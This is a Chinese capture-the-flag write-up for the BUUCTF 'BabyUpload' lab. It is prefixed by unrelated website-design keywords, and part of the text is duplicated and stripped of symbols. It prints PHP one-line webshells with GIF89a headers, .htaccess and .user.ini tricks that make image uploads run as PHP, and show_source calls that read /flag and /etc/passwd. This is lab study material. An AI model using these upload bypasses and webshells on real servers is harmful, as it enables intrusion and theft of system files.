网站建设学什么好,网页与网站设计 什么是属性,网页设计专业课程介绍,深圳建设局官方网站BUUCTF——[GXYCTF2019]BabyUpload
1.上传嘛#xff0c;直接丢正常的jpg文件进服务器 2.发现可以正常上传#xff0c;并且回显出来啦文件上传的路径 /var/www/html/upload/7df22610744ec51e9cb7a8a8eb674374/1111.jpg
3.尝试上传一句话木马
?php eval($POST[123456]…BUUCTF——[GXYCTF2019]BabyUpload
1.上传嘛直接丢正常的jpg文件进服务器 2.发现可以正常上传并且回显出来啦文件上传的路径 /var/www/html/upload/7df22610744ec51e9cb7a8a8eb674374/1111.jpg
3.尝试上传一句话木马
?php eval($POST[123456]);?4.通过上面的回显可以看出来检测到了php文件尝试文件头进行绕过 GIF89a ?php eval($POST[123456]);? 5.还是不得行推测使用了?php标签进行检测尝试绕过 GIF89a script languagephpeval($_REQUEST[8])/script 6.发现可以成功上传尝试修改后缀名php,php3,php5,phtml
7.发现后缀名不能有ph中间还尝试php%00发现php版本过高不得行发现可以上传.user.ini,尝试.user.ini绕过
auto_prepend_file555.jpg8.发现是可以上传的但是呢无法解析后面试了.htaccess发现可以使用.htaccess可以成功getshell
.htaccess文件内容
SetHandler application/x-httpd-php9.上传文件,文件内容为
GIF89a
script languagephpeval($_REQUEST[8])/script10.成功getshell
11.蚁剑死活连接不上太致命啦重启了靶机重新上传.htaccess
FilesMatch jpgSetHandler application/x-httpd-php/FilesMatch12.重新上传木马文件还是连接不上
GIF89a
script languagephpeval($_REQUEST[8])/script13.通过报错信息发现禁用了系统函数 14.只能另辟蹊径啦使用其他函数 show_source()函数
8show_source(/flag,false);15.成功读取文件信息
8show_source(/etc/passwd,false);
